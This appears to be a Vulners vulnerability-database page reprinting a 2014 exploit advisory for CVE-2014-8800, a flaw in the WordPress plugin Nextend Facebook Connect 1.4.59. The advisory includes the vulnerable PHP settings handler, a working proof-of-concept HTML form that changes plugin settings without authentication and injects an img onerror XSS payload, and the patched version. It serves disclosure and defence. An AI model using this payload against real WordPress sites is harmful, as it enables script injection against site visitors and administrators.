| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2014-8800 | 5 Dec 201415:00 | – | cve | |
| CVE-2014-8800 | 5 Dec 201415:00 | – | cvelist | |
| EUVD-2014-8630 | 7 Oct 202500:30 | – | euvd | |
| WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting | 2 Dec 201400:00 | – | exploitpack | |
| CVE-2014-8800 | 5 Dec 201415:59 | – | nvd | |
| WordPress Nextend Facebook Connect Plugin 1.4.59 - XSS | 2 Dec 201400:00 | – | patchstack | |
| Cross site scripting | 5 Dec 201415:59 | – | prion | |
| Nextend Facebook Connect <= 1.4.59 - Cross-Site Scripting (XSS) | 12 Feb 201400:00 | – | wpvulndb |
# Exploit Title: Nextend Facebook Connect 1.4.59 XSS
# Date: 16-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.4.59.zip
# Category: webapps
# CVE: CVE-2014-8800
1. Description
Anyone can change plugin settings.
File: nextend-facebook-connect\nextend-facebook-settings.php
if(isset($_POST['newfb_update_options'])) {
if($_POST['newfb_update_options'] == 'Y') {
foreach($_POST AS $k => $v){
$_POST[$k] = stripslashes($v);
}
update_option("nextend_fb_connect", maybe_serialize($_POST));
$newfb_status = 'update_success';
}
}
http://security.szurek.pl/nextend-facebook-connect-1459-xss.html
2. Proof of Concept
<form method="post" action="http://wordpress-instalation">
<input type="hidden" name="newfb_update_options" value="Y">
XSS: <textarea name="fb_login_button" rows="10" cols="40"><img src=x onerror=alert(String.fromCharCode(88,83,83))></textarea>
<input type="submit" value="Hack!">
</form>
3. Solution:
Update to version 1.5.1
https://downloads.wordpress.org/plugin/nextend-facebook-connect.1.5.1.zip
https://wordpress.org/plugins/nextend-facebook-connect/changelog/Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation